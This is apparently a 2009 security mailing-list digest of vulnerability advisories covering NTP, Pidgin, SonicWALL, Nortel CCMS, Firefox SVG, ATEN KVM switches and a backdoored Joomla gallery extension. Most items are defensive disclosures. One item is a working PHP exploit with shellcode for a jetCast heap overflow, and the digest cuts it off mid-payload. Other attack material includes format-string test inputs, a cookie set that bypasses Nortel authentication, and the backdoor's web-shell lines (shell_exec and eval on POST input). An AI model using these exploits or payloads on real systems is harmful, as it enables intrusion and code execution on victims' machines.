[ GLSA 200905-08 ] NTP: Remote execution of arbitrary code

2009-05-26 Thread Alex Legler 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200905-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: NTP: Remote execution of arbitrary code
  Date: May 26, 2009
  Bugs: #263033, #268962
ID: 200905-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple errors in the NTP client and server programs might allow for
the remote execution of arbitrary code.

Background
==

NTP contains the client and daemon implementations for the Network Time
Protocol.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  net-misc/ntp < 4.2.4_p7   >= 4.2.4_p7

Description
===

Multiple vulnerabilities have been found in the programs included in
the NTP package:

* Apple Product Security reported a boundary error in the
  cookedprint() function in ntpq/ntpq.c, possibly leading to a
  stack-based buffer overflow (CVE-2009-0159).

* Chris Ries of CMU reported a boundary error within the
  crypto_recv() function in ntpd/ntp_crypto.c, possibly leading to a
  stack-based buffer overflow (CVE-2009-1252).

Impact
==

A remote attacker might send a specially crafted package to a machine
running ntpd, possibly resulting in the remote execution of arbitrary
code with the privileges of the user running the daemon, or a Denial of
Service. NOTE: Successful exploitation requires the "autokey" feature
to be enabled. This feature is only available if NTP was built with the
'ssl' USE flag.

Furthermore, a remote attacker could entice a user into connecting to a
malicious server using ntpq, possibly resulting in the remote execution
of arbitrary code with the privileges of the user running the
application, or a Denial of Service.

Workaround
==

You can protect against CVE-2009-1252 by disabling the 'ssl' USE flag
and recompiling NTP.

Resolution
==

All NTP users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.4_p7"

References
==

  [ 1 ] CVE-2009-0159
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0159
  [ 2 ] CVE-2009-1252
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1252

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200905-08.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: This is a digitally signed message part

SEC Consult SA-20090525-4 :: SonicOS Format String Vulnerability

2009-05-26 Thread Bernhard Mueller 
SEC Consult Security Advisory < 20090525-4 >
==
  title: SonicOS Format String Vulnerability
program: SonicWALL Global VPN Client
 vulnerable version: PRO 4100 SonicOS 4.0.0.2-51e Standard and Enhanced
 possibly other versions
   homepage: http://www.sonicwall.com
  found: October 2006
 by: lofi42
 permanent link: https://www.sec-consult.com/advisories_e.html#a54
==

Product description:


SonicOS Enhanced (SonicOSe) is the latest version of SonicWALL's
powerful SonicOS operating system, designed for the next generation of
SonicWALL firewall/VPN appliances.


Vulnerability overview:
---

A format string vulnerability exists in the logfile parsing function of
SonicOS. An attacker could crash the system or execute arbitrary code by
injecting format string metacharacters into the logfile, if an
administrator subsequently uses the SonicOS GUI to view the log.


Proof of concept:
-

There are multiple ways to inject format string characters into the
logs. The following methods can be used to test for the vulnerability:

1. CFS: Add ebay.com to your "Forbidden Domains" and access
http://www.ebay.com/%s%s%s%s%s%s/. 

2. GroupVPN: Establish an GroupVPN Tunnel and enter at the XAUTH
Username %s%s%s%s%s. 

3. Webfrontend: Enter at the Login Page of your SonicWALL as Username %s
%s%s%s%s. 


SEC Consult will not release code execution exploits for this
vulnerability to the public.



Vendor contact timeline:


2006:   Vulnerability found
2006.10.25: Vulnerability first reported to vendor
2009.02.17: Vulnerability reported to vendor again
2009.03.16: Request for status update
2009.04.21: Request for status update
2009.05.25: Public Release


Patch:
--

SEC Consult was not able to get any vendor feedback on this issue. We
are currently not aware of a patch or workaround.


--

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF SEC Consult Vulnerability Lab / @2009

SEC Consult SA-20090525-3 :: SonicWALL Global VPN Client Local Privilege Escalation Vulnerability

2009-05-26 Thread Bernhard Mueller 
SEC Consult Security Advisory < 20090525-3 >
==
  title: SonicWALL Global VPN Client Local Privilege
Escalation Vulnerability
program: SonicWALL Global VPN Client
 vulnerable version: Global VPN Client <= 4.0.0.835
 possibly other versions
   homepage: http://www.sonicwall.com
  found: October 2006
 by: lofi42
 permanent link: https://www.sec-consult.com/advisories_e.html#a55
==

Vendor description:
---

The SonicWALL Global VPN Client offers an easy-to-use, easy-to-manage
Virtual Private Network (VPN) solution that provides users at
distributed locations with secure, reliable remote access via broadband,
wireless and dial-up connections.

[source: http://www.sonicwall.com/downloads/Global_VPN_DS_US.pdf]


Vulnerability overview:
---

A local privilege escalation vulnerability exists in SonicWALL Global
VPN client. By exploiting this vulnerability, a local attacker could
execute code with LocalSystem privileges.


Vulnerability description:
--

During installation of SonicWALL Global VPN Client permissions for
installation folder "%ProgramFiles%\SonicWALL\SonicWALL Global VPN
Client" by default are set to Everyone:Full Control without any warning.

The Service "RampartSvc" is started from this folder. Services are
started under LocalSystem account. There is no protection of service
files. It's possible for unprivileged users to replace service
executable with the file of his choice to get full access with
LocalSystem privileges. 


Proof of concept:
-

This vulnerability can be exploited without any special exploit code.


Vendor contact timeline:


2006:   Vulnerability found
2006.10.25: Vulnerability first reported to vendor
2009.02.17: Vulnerability reported to vendor again
2009.03.16: Request for status update
2009.04.21: Request for status update
2009.05.25: Public Release


Patch:
--

SEC Consult was not able to get any vendor feedback on this issue. We
are currently not aware of a patch or workaround.


--

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF SEC Consult Vulnerability Lab / @2009

SEC Consult SA-20090525-2 :: SonicWALL Global Security Client Local Privilege Escalation Vulnerability

2009-05-26 Thread Bernhard Mueller 
SEC Consult Security Advisory < 20090525-2 >
==
  title: SonicWALL Global Security Client Local Privilege 
 Escalation Vulnerability
program: SonicWALL Global Security Client
 vulnerable version: 1.0.0.15 and possibly other versions
   homepage: http://www.sonicwall.com
  found: October 2006
 by: lofi42
 permanent link: https://www.sec-consult.com/advisories_e.html#a56
==

Vendor description:
---

The SonicWALL Global Security Client offers IT professionals the
capability to manage a mobile user’s online access, based upon corporate
policies, in order to ensure optimal security of the network and
maximize network resources. Instant messaging, high-risk Web sites and
network file access can all be allowed or disallowed as security and
productivity concerns dictate. 

[source:
http://www.sonicwall.com/downloads/DS_GlobalSecurityClient_A4.pdf]


Vulnerability overview:
---

Local exploitation of a design error in SonicWALLs Global Security
Client could allow attackers to obtain increased privileges.


Vulnerability description:
--

The problem specifically exists because SYSTEM privileges are not
dropped when accessing the GSC properties from the System Tray applet.
The vulnerability can be exploited by right-clicking the System Tray
icon, choosing "Log", right click "Event Viewer", "Open Log File...".
The opened file selected can be abused by navigating to C:\WINDOWS
\SYSTEM32\, right-clicking cmd.exe, then selecting "Open"; doing so
spawns a command shell with SYSTEM privileges.


Proof of concept:
-

This vulnerability can be exploited without any special exploit code.


Vendor contact timeline:


2006:   Vulnerability found
2006.10.25: Vulnerability first reported to vendor
2009.02.17: Vulnerability reported to vendor again
2009.03.16: Request for status update
2009.04.21: Request for status update
2009.05.25: Public Release


Patch:
--

SEC Consult was not able to get any vendor feedback on this issue. We
are currently not aware of a patch or workaround.


--

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF SEC Consult Vulnerability Lab / @2009

SEC Consult SA-20090525-1 :: Nortel Contact Center Manager Server Password Disclosure Vulnerability

2009-05-26 Thread Bernhard Mueller 
SEC Consult Security Advisory < 20090525-1 >
==
  title: Nortel Contact Center Manager Server Password 
 Disclosure
program: Nortel Contact Center Manager Server
 vulnerable version: 6.0
   homepage: http://www.nortel.com/ccms
  found: 2008-11-14
 by: David Matscheko / SEC Consult Vulnerability Lab
 permanent link: https://www.sec-consult.com/advisories_e.html#a57
==

Vendor description:
---

Contact Center Manager Server (CCMS) offers a scalable solution for
dynamic contact center environments requiring sophistication and
differentiation in the care offered to their customers. CCMS provides
skill-based routing; call treatment flexibility, real time displays,
multimedia routing, and comprehensive management and reporting
functionality - empowering contact center managers with the tools and
agility to deliver unique and unprecedented care to their customers. The
rich scripting language supports multifaceted call routing and treatment
decisions based on combinations of real time conditions. 

[source: http://www.nortel.com/ccms]


Vulnerability overview:
---

The Nortel Contact Center Manager Server web application provides a SOAP
interface. This interface does not need authorisation and responds to
certain requests with sensitive information.


Vulnerability description:
--

The following SOAP request queries the user data for the user
"sysadmin":

---
POST /Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx
HTTP/1.1
Host: 10.1.2.3
Content-Type: text/xml; charset=utf-8
SOAPAction:
"http://SoapWrapperCommon.CCMA.Applications.Nortel.com/SOAPWrapperCommon_UsersWS_GetServers_Wrapper";
Content-Length: 661


http://www.w3.org/2001/XMLSchema-instance";
xmlns:xsd="http://www.w3.org/2001/XMLSchema";
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/";>
  
http://SoapWrapperCommon.CCMA.Applications.Nortel.com";>
  string
  string
  string
  string
  string
  string

  

---

The following is an excerpt of the response to the previous query. It
contains the user sysadmin with the corresponding password (password,
server IP address, and server name has been changed):

---



---


Proof of concept:
-

This vulnerability can be exploited with a web browser and plugins / web
proxy.


Vulnerable versions:


The version tested was 06.00.004.03 with the following updates applied:

CCMA_6.0_SU_05
CCMA_6.0_SUS_0501
CCMA_6.0_SUS_0502

Prior versions are most likely also vulnerable.


Vendor contact timeline:


January 2009: Vendor informed about vulnerability
2009-05-14: Patch available
2009-05-25: Public Release


Patch:
--

The vendor has released a vulnerability fix which addresses the issue.
In addition, the vendor has released a public security advisory
containing update instructions. URL:

http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=905808


--

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF David Matscheko / @2009

COWON America jetCast 2.0.4.1109 (.mp3) local heap buffer overlow exploit

2009-05-26 Thread nospam 
http://retrogod.altervista.org/

software site: http://www.jetaudio.com/

Tested against JetAudio pack v.7.5.2


-

Passing an overlong string as id3 tag we have:

 

(370.7a8): Access violation - code c005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=41414141 ebx=0394 ecx=41414141 edx=00160608 esi=010c1a00 
edi=0302fbc8

eip=00486db7 esp=0302fb14 ebp=0302fe7c iopl=0 nv up ei pl nz ac 
po nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= 
efl=00010212

jetCast+0x86db7:

00486db7 8b11mov edx,dword ptr [ecx]  
ds:0023:41414141=

 

code:

00486DB7  |. 8B11   MOV EDX,DWORD PTR DS:[ECX] <---crash

00486DB9  |. 8B8D ACFC  MOV ECX,DWORD PTR SS:[EBP-354]

00486DBF  |. FF52 0CCALL DWORD PTR DS:[EDX+C]

...


-

We have 4 bytes of ecx to redirect the program to edi, which keeps our 
buffer.

To do that first we set ecx to a portion of memory which *always* (or 
nearly) keeps

the filename.

Look 0x0105... no null char allowed, so I will use 0x01050101 to 
hit the right

offset.

 

To build it we need an address which points to a known call edi, 
compatible with

windows filenames. To achieve that you may do so:

x...@pyro ~/framework-2.2/tools

$ memdump (pid) jetcast

x...@pyro ~/framework-2.2/tools

$ cd ..

x...@pyro ~/framework-2.2/

$ msfpescan -d ./tools/jetcast/ -j edi

0x7d03388b call edi

...

x...@pyro ~/framework-2.2/tools

$ msfpescan -d ./tools/jetcast/ -x "\x8b\x38\x03\x7d"

0x028997c4   8b38037d

0x77e062f5   8b38037d

...

then subtract c. Repeat this for each call edi, took me some time to 
find every

combination by a script and I finally found a good one in the 
MSVCRT.DLL given

with the program; a third match seems not possible.

Note: first bytes of EDI keep some null chars, but as you can see, this

portion is nop-equivalent:

0348FBC8    ADD BYTE PTR DS:[EAX],AL

0348FBCA    ADD BYTE PTR DS:[EAX],AL

0348FBCC    ADD BYTE PTR DS:[EAX],AL

0348FBCE    ADD BYTE PTR DS:[EAX],AL

0348FBD0   90   NOP

0348FBD1   90   NOP

0348FBD2   90   NOP

...

 

Usage: php 9sg_jetcast_poc.php

It creates 4 files on your desktop, it says which will hit the right 
offset on

your system (file path is important to achieve arbitrary code execution 
on a victim user

so an attacker should persuade him to try to stream them ...)

It works by dragging the file on it or by right clicking and selecting 
"Add files ...",

not 100% reliable, version specific...


-

*/

 

error_reporting(0);

if (php_sapi_name() <> "cli")

{

die("[!] Launch from the cli!");

}

 

$scode = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53". 
"\xbb\x0d\x25\x86\x7c". //WinExec, 0x7c86250d

"\xff\xd3\x31\xc0\x50". "\xbb\x12\xcb\x81\x7c". //ExitProcess, 
0x7c81cb12

"\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65". 
"\x78\x65\x20\x2f\x63\x20". "cmd /c calc && ". "\xff";

 

if (strlen($scode) > 118)

{

die("[!] Shellcode too large here!");

}

$BOOM = 
"\x49\x44\x33\x03\x00\x00\x00\x00\x07\x7b\x54\x49\x54\x32\x00\x00\x03\xbe\x00\x00\x00".
 str_repeat("\x90", 0x7c).//nop, very reusable

"\xeb\x06\x90\x90". //jmp short

 

//"\x01\x01\x06\x01". //less usually in this location...

"\x01\x01\x05\x01". //eax - ecx, this works 80% of the times

"\x90\x90\x90\x90". //nop

$scode. str_repeat("A", 0x01f0 - strlen($scode)). 
"\x54\x41\x4c\x42\x00\x00\x00\x02\x00\x00\x00\x31\x54\x59\x45\x52\x00\x00\x00\x05\x00\x00\x00\x31\x39\x35\x30\x54\x43\x4f".
 
"\x4e\x00\x00\x00\x02\x00\x00\x00\x31\x54\x43\x4f\x50\x00\x00\x00\x02\x00\x00\x00\x31\xff\xfb\x90\x64\x00\x00\x00\x00\x00\x00\x00".
 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x6e\x66\x6f\x00\x00\x00".
 
"\x0f\x00\x00\x04\x7e\x00\x07\x57\x2e\x00\x02\x05\x08\x0a\x0d\x10\x12\x14\x17\x19\x1c\x1f\x21\x24\x27\x28\x2b\x2e\x30\x

SEC Consult SA-20090525-0 :: Nortel Contact Center Manager Server Authentication Bypass Vulnerability

2009-05-26 Thread Bernhard Mueller 
SEC Consult Security Advisory < 20090525-0 >
==
  title: Nortel Contact Center Manager Server Authentication
 Bypass
program: Nortel Contact Center Manager Server
 vulnerable version: 6.0
   homepage: http://www.nortel.com/ccms
  found: 2008-11-14
 by: Bernhard Mueller / SEC Consult Vulnerability Lab
 permanent link: https://www.sec-consult.com/advisories_e.html#a58
==

Vendor description:
---

Contact Center Manager Server (CCMS) offers a scalable solution for
dynamic contact center environments requiring sophistication and
differentiation in the care offered to their customers. CCMS provides
skill-based routing; call treatment flexibility, real time displays,
multimedia routing, and comprehensive management and reporting
functionality - empowering contact center managers with the tools and
agility to deliver unique and unprecedented care to their customers. The
rich scripting language supports multifaceted call routing and treatment
decisions based on combinations of real time conditions. 

[source: http://www.nortel.com/ccms]


Vulnerability overview:
---

The Nortel Contact Center Manager Server web application relies on
client side cookies to check the roles of authenticated users.
Authentication can be bypassed by manually setting the required cookies.
By exploiting this vulnerability, an attacker can bypass authentication
and access the Nortel Contact Center Manager Server.


Vulnerability description:
--

The following cookies have to be set to access all menu items:

LoginMsgSwitch=True
LoginMsgAccepted=True
Logged=True
isAdmin=True
LoginMsgSwitch=True
LoginMsgAccepted=True
IsConfig=1
IsUser=1
IsRTD=1
IsReport=1
IsScript=1
IsAudit=1
IsEmHelp=1
isOutbound=1
UserID=x
AuditSwitch=on
LoginMsgAccepted=True


Proof of concept:
-

This vulnerability can be exploited with a web browser and plugins / web
proxy.


Vulnerable versions:


The version tested was 06.00.004.03 with the following updates applied:

CCMA_6.0_SU_05
CCMA_6.0_SUS_0501
CCMA_6.0_SUS_0502

Prior versions are most likely also vulnerable.


Vendor contact timeline:


January 2009: Vendor informed about vulnerability
2009-05-14: Patch available
2009-05-25: Public Release


Patch:
--

The vendor has released a vulnerability fix which addresses the issue.
In addition, the vendor has released a public security advisory
containing update instructions. URL:

http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=905698


--

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2008

[ GLSA 200905-07 ] Pidgin: Multiple vulnerabilities

2009-05-26 Thread Alex Legler 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200905-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Pidgin: Multiple vulnerabilities
  Date: May 25, 2009
  Bugs: #270811
ID: 200905-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities in Pidgin might allow for the remote execution
of arbitrary code or a Denial of Service.

Background
==

Pidgin (formerly Gaim) is an instant messaging client for a variety of
instant messaging protocols.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  net-im/pidgin   < 2.5.6  >= 2.5.6

Description
===

Multiple vulnerabilities have been discovered in Pidgin:

* Veracode reported a boundary error in the "XMPP SOCKS5 bytestream
  server" when initiating an outgoing file transfer (CVE-2009-1373).

* Ka-Hing Cheung reported a heap corruption flaw in the QQ protocol
  handler (CVE-2009-1374).

* A memory corruption flaw in "PurpleCircBuffer" was disclosed by
  Josef Andrysek (CVE-2009-1375).

* The previous fix for CVE-2008-2927 contains a cast from uint64 to
  size_t, possibly leading to an integer overflow (CVE-2009-1376, GLSA
  200901-13).

Impact
==

A remote attacker could send specially crafted messages or files using
the MSN, XMPP or QQ protocols, possibly resulting in the execution of
arbitrary code with the privileges of the user running the application,
or a Denial of Service. NOTE: Successful exploitation might require the
victim's interaction.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Pidgin users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-im/pidgin-2.5.6"

References
==

  [ 1 ] CVE-2009-1373
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1373
  [ 2 ] CVE-2009-1374
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1374
  [ 3 ] CVE-2009-1375
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1375
  [ 4 ] CVE-2009-1376
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376
  [ 5 ] GLSA 200901-13
http://www.gentoo.org/security/en/glsa/glsa-200901-13.xml

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200905-07.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: This is a digitally signed message part

[TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)

2009-05-26 Thread Thierry Zoller 


   From the low-hanging-fruit-department 
 Firefox et al. Denial of Service - All versions supporting SVG


CHEAP Plug :

You are invited to participate in HACK.LU 2009, a small but concentrated
luxemburgish security conference. More information : http://www.hack.lu
CFP is open, sponsorship is still possible and warmly welcomed!


Release mode: Forced release.
Ref : [TZO-26-2009] - Firefox DoS (unclamped loop) SVG
WWW : http://blog.zoller.lu/2009/04/advisory-firefox-dos-condition.html
Vendor  : http://www.firefox.com
Status  : No patch
CVE : none provided
Credit  : none 
Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=465615

Security notification reaction rating : There wasn't any reaction. OSS Security 
notification FTW
Notification to patch window : x+n

Disclosure Policy : 
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products : 
- Firefox all supporting SVG (didn't care to investigate which, task of the 
vendor)
- all software packages using mozilla engine and allowing SVG

I. Background
~
Firefox is a popular internet browser.

II. Description
~~~
This bug is a typical result of what we call unclamped loop. An "attacker"
will give the Radius value of the Circle attribute a very big value. That
is leetness. 

Stack trace : 
ntkrnlpa.exe+0x6e9ab
ntkrnlpa.exe!MmIsDriverVerifying+0xbb0
hal.dll+0x2ef2
xul.dll!NS_InvokeByIndex_P+0x30c36
xul.dll!NS_InvokeByIndex_P+0x30e8a
xul.dll!NS_InvokeByIndex_P+0x30e02
xul.dll!NS_InvokeByIndex_P+0x30f5e
xul.dll!XRE_InitEmbedding+0x7858
xul.dll!XRE_InitEmbedding+0xf4ee
xul.dll!XRE_TermEmbedding+0x11411
xul.dll!gfxTextRun::Draw+0xdd4d
xul.dll!gfxTextRun::Draw+0xe1ca
xul.dll!gfxWindowsPlatform::PrefChangedCallback+0x1495
xul.dll!gfxTextRun::SetSpaceGlyph+0x2678
xul.dll!gfxFont::NotifyLineBreaksChanged+0xf1d3
xul.dll!gfxWindowsPlatform::RunLoader+0xa9f6
xul.dll!NS_StringCopy_P+0x9942
xul.dll!gfxImageSurface::gfxImageSurface+0x3188
xul.dll!gfxImageSurface::gfxImageSurface+0x2ed8


Also produces exceptions in MOZCRT19...
MOZCRT19!modf+0x2570:
600715e0 660f122550450960 movlpd  xmm4,qword ptr 
[MOZCRT19!exception::`vftable'+0x1a3d8 (60094550)] 
ds:0023:60094550=3fe62e42fefa39ef

III. Impact
~~~
Browser doesn't respond any longer to any user input, all tabs are no 
longer accessible, your work if any  (hail to the web 2.0) might be lost.

IV. Proof of concept (hold your breath)
~~~







IV. Disclosure timeline
~
DD/MM/
18/11/2008 : Created bugzilla entry (security) with proof of concept, 
 description the terms under which ooperate and the planned 
disclosure date.

24/22/2008 : Daniel Veditz comments : "Might be a cairo bug rather than SVG 
 (seems to be looping in libthebes), but I can definitely confirm 
 the DoS.
  
14/12/2008 : Ask for any action plan and my assessement of considering it low 
risk

 No reply.

28/12/2008 : "Timeless" comments [..] personally, i intend to open this bug 
 to the public [..] a bug like this is more likely to be fixed 
 by being visible to more people than by leaving it in 
a closet.
 
26/05/2009 : In 2009 I agree; release of this advisory.

Multiple vulnerabilities in several ATEN IP KVM Switches

2009-05-26 Thread Jakob Lell 

Jakob Lell from the TU Berlin computer security working group (
http://www.agrs.tu-berlin.de/v-menue/ag_rechnersicherheit/parameter/en/
) has discovered multiple vulnerabilities in several ATEN IP KVM
Switches.


Affected products:
- ATEN KH1516i IP KVM Switch (browser firmware version 1.0.063)
- ATEN KN9116  IP KVM Switch (firmware version 1.1.104)
- Aten PN9108  Power over the NET (only CVE-2009-1477)

The KH1508i uses the same firmware as the KH1516i and is thus most
likely affected as well. The KN9108 uses the same firmware as the
KN9116. It is possible that other devices are affected as well. If you
have access to other similar devices and want to test whether they are
vulnerable as well, please contact me at ja...@cs.tu-berlin.de.


Impact: Arbitrary code execution on client system, Information
disclosure and man in the middle attacks.

Background:
Aten produces several IP KVM Switches. This devices can be used like a
normal kvm switch with an attached keyboard, mouse and monitor.
However, it is also possible to access the hosts connected to the kvm
switch via a network using an ordinary PC as a client. As this can
also be used via an insecure network, it is very important that this
connection is cryptographically protected against sniffing of
confidential data (e.g.  keystrokes, monitor signals) and man in the
middle attacks. The affected products provide an SSL encrypted web
interface. After authenticating to the web interface the user can
download a client program (java or windows). The client program
contains temporary authentication data so that it can connect to the
kvm switch without asking the user for username/password again.

CVE-2009-1477: Same SSL Key for all devices
All tested devices (KH1516i, KN9116 and PN9108) use the same SSL key
for the https web interface. If an attacker manages to extract the
private key from one single device, (s)he can decrypt the https
traffic of all other affected devices. This includes the username and
password used to authenticate to the kvm switch. If the attacker is
able to carry out a man in the middle attack, (s)he can also
compromise client systems by exchanging the windows or java client
software which is downloaded from the kvm switch via https.
Severity: High

CVE-2009-1472: Java client arbitrary code execution
The java client program connects to the kvm switch on port 9002 and
downloads and runs a new java class. This connection is encrypted
using AES. However, the encryption key is hardcoded in the client
program. So a man in the middle attacker can inject an other java
class file which can execute arbitrary java code on the client
computer. This java code is not protected by a sandbox as the client
isn't run as a java applet.  It is also possible to use this
vulnerability to do a man in the middle attack to gain access to the
machines connected to the kvm switch.
Severity: High

CVE-2009-1473: Cryptographic weakness in key exchange
When the windows/java client connects to the device, the kvm switch
and the client negotiate a symmetric session key. This key negotiation
uses RSA in an insecure way. An attacker who can monitor the traffic
between the client and the kvm switch is able to repeat client-side
calculations to get the session key. By using this session key an
attacker can decrypt the traffic and reconstruct the keystrokes.
Furthermore it is also possible to carry out a man in the middle
attack and gain access to the machines connected to the KVM switch.
Both the Windows and the Java clients are affected.
Severity: High

CVE-2009-1474: Incomplete encryption
The connection between the client and the kvm switch is not completely
encrypted. The transfer of keystrokes is encrypted. However, mouse
events are not protected in any way. So a man in the middle attacker
can inject arbitrary mouse movements and press mouse buttons.
Depending on the operating system and setup this may be used to
compromise computers attached to the kvm switch.
Severity: Medium

CVE-2009-1474: Session ID Cookie not secure-only
When the user connects to the device via http on port 80, the device
redirects the user to the same device on port 443 (https). There the
user logs in and gets a session id cookie. However, this cookie does
not contain the secure option as specified in rfc2109. When the user
goes back to http for any reason, an attacker can sniff the session
id. Using this session ID it is possible to download the Windows/Java
client program (which contains authentication data) and then access
the computers connected to the KVM Switch. As the first connection via
http to the kvm switch is not protected, a man in the middle attacker
can inject some dynamic content so that the browser automatically
reloads the http site after logging in.
Severity: Low

The vendor has been notified about CVE-2009-1473 on 5.3.2009 and about
the other issues on 30.4.2009. Up to now we didn't receive a firmware
upgrade.

Suggested workaround: Avoid connecting to the KVM Switch via untr

Backdoor in com_rsgallery2 gallery extension for joomla

2009-05-26 Thread Jan van Niekerk 
Vulnerability:
Remote code execution back door(s)

Software:
RSGallery2 - Gallery Extension for Joomla!
We are currently working on a new website. All files are still 
available at 
the JoomlaCode project page.

Severity:
Not a big deal.  Joomla components contain all sorts of obfuscated junk 
all 
the time.  Who cares what it does?

URLs:
http://rsgallery2.net/
http://joomlacode.org/gf/download/frsrelease/6756/38088/com_rsgallery2_legacy_1.14.3.zip
http://joomlacode.org/gf/download/frsrelease/7791/36662/com_rsgallery2_2.0.0b1.zip

Joomlacode.org says, about these releases:
RSGallery2 1.14.3 Security Release
Jonah Braun
2008-02-13
This is an updated production alpha containing a low threat security 
fix. If 
you use commenting you should upgrade. An option to show/hide the 
Search box
has also been added. See the official site for downloads and support: 
http://rsgallery2.net/

RSGallery2 2.0.0b1 released
John Caprez
2008-06-23
This is the first version of RSGallery2 that runs in Joomla 1.5 native 
mode.
 
Special thanks goes to all the translators providing the updated 
language 
files and the testers of the nightly builds.
Download it and enjoy. Feel free to report any bugs or problems in the 
forum 
at the RSGallery2 main web site 

Vendor notified:
  I tried.  Not very hard though.  joomlacode doesn't seem to have a security 
  contact and links to joomla.org as if they are the same crowd.  I'm sending 
  a BCC to the given address for Jonah Braun though.  I'll send it to bugtraq, 
  and they will sit on it for a few hours.
  http://developer.joomla.org/security.html
  Huh?  Do I need more coffee, or does this page say to contact them using 
  the details at this page?  So you do that, and it says ... no wait, 
  infloop.  Oh wait, there is a contact form.  Filled something in.  Blah.

Vulnerability:

% wget \
http://joomlacode.org/gf/download/frsrelease/6756/38088/com_rsgallery2_legacy_1.14.3.zip

% unzip com_rsgallery2_legacy_1.14.3.zip

% egrep -r '(eval|exec).*POST' .

./language/english-utf8.php:$result = 
shell_exec($_POST['cmd'] . " 2>&1 ; pwd");
./language/english-utf8.php:$result = shell_exec($_POST['cmd'] . " 
2>&1");
./includes/rsgallery.class.php:$out = execute($_POST['cmd']);
./includes/rsgallery.class.php:eval($_POST['php']);
./includes/rsgallery.class.php:$out = execute($_POST['alias']);

There's other fun obfuscated javascript hiding in 'eval's'.

Ditto version 2

nuf sed  &:-)